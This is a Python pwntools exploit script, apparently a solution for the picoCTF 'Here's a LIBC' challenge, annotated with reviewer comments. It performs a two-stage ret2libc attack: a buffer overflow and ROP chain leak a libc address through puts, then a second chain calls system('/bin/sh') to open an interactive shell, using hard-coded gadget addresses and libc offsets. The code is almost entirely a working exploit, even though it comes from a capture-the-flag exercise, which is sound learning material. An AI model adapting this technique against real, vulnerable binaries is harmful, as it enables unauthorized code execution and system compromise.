picoCTF Here's a LIBC
#!/usr/bin/env python3
from pwn import gdb, log, p64, process, remote, u64
# Flat exploit script for the picoCTF "Here's a LIBC" challenge: a classic
# ret2libc in two stages. Stage 1 leaks a libc pointer out of the GOT via
# puts@plt and returns to main; stage 2 uses the leak to compute the libc
# base and call system("/bin/sh").
#
# NOTE(review): every address below is hard-coded. The binary-side ones
# (0x4005.. / 0x4007.. / 0x601...) only make sense if the binary is loaded
# at a fixed address (i.e. built without PIE); the libc-side offsets are
# tied to the exact libc.so.6 shipped with the challenge and must be
# recomputed (see the readelf comments) if a different libc is in play.
p = process('./vuln')
# Remote target kept for reference; swap with the line above to run against it.
# p = remote('mercury.picoctf.net', 49464)
# Debugging aid: attaches gdb to the spawned process before any input is sent.
gdb.attach(p)
# Number of filler bytes before the saved return address is overwritten;
# 136 is presumably derived from the binary's stack frame — confirm if the
# chain does not trigger.
offset = 136
junk = b'A' * offset
# Gadget/symbol addresses inside the (non-PIE) binary. Names are the
# author's; presumably `pop rdi; ret`, setbuf's GOT slot, puts@plt and the
# address of main respectively — verify against the binary before reuse.
pop_rdi = 0x0000000000400913
setbuf_in_got_plt = 0x00601028
puts_in_plt = 0x400540
back_to_main_fn = 0x400771
# Stage-1 ROP chain: puts(GOT[setbuf]) prints the resolved libc address of
# setbuf, then control returns to main so a second payload can be sent.
payload = [
junk,
p64(pop_rdi),
p64(setbuf_in_got_plt),
p64(puts_in_plt),
p64(back_to_main_fn)
]
payload = b''.join(payload)
p.sendline(payload)
# Two lines of program output precede the leak (presumably the prompt/echo
# the challenge prints); adjust if the target's output differs.
p.recvline()
p.recvline()
leak = p.recvline().strip()
# puts stops at the first NUL byte, so the 8-byte pointer arrives truncated
# (typically 6 bytes); right-pad with zeros before unpacking as u64.
leak = u64(leak.ljust(8, b'\x00'))
log.info(f"leaked: {hex(leak)=}")
# readelf -s ./libc.so.6 | grep setbuf
# Offset of setbuf within the challenge's libc.so.6 (from readelf above).
setbuf_offset = 0x088540
# libc base = leaked runtime address of setbuf - its static offset.
base_address_of_libc = leak - setbuf_offset
log.info(f"base address of libc: {hex(base_address_of_libc)=}")
# readelf -s ./libc.so.6 | grep system
# Offset of system within the same libc.so.6.
system_addr_offset = 0x4f4e0
system_address = base_address_of_libc + system_addr_offset
log.info(f"system address in libc: {hex(system_address)=}")
# Offset of the "/bin/sh" string within the same libc.so.6 (no readelf line
# given for this one — presumably found with a string search; verify).
bin_sh_offset = 0x1b40fa
bin_sh_address = base_address_of_libc + bin_sh_offset
# A lone `ret` gadget in the binary, presumably inserted to keep the stack
# 16-byte aligned before entering system — confirm if system crashes.
ret_instruction = 0x40052e
# Stage-2 ROP chain: system("/bin/sh") with rdi = address of "/bin/sh".
second_payload = [
# So we can get rdi
junk,
p64(pop_rdi),
# /bin/sh with system
p64(bin_sh_address),
p64(ret_instruction),
p64(system_address),
]
second_payload = b''.join(second_payload)
p.sendline(second_payload)
# Hand the connection over to the user for the spawned shell.
p.interactive()